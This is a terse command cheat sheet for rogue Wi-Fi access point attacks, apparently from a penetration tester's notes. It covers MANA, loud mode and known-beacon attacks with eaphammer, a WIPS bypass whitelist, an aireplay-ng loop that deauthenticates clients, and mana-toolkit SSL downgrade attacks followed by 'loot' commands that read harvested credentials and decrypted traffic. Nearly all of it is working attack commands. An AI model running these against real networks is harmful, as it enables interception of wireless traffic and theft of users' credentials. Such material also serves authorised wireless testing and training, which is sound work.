MANA and known beacons

WIPS bypass

Create white list

echo <BSSID> > bssid_targets.txt

Create rogue AP

./eaphammer -i <wlan0> --e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt

As the rogue AP is waiting for probe requests, deauthenticate supplicants

for i in `cat bssid_targets.txt`; do aireplay-ng -0 5 -a <ap_mac> -c $i; done 

MANA loud mode

./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud

Known beacon attack

./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]

Mana-toolkit (deprecated) - HTTP downgrade attacks

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/custom.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keywork>
cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk /tmp/sslsplit/* -e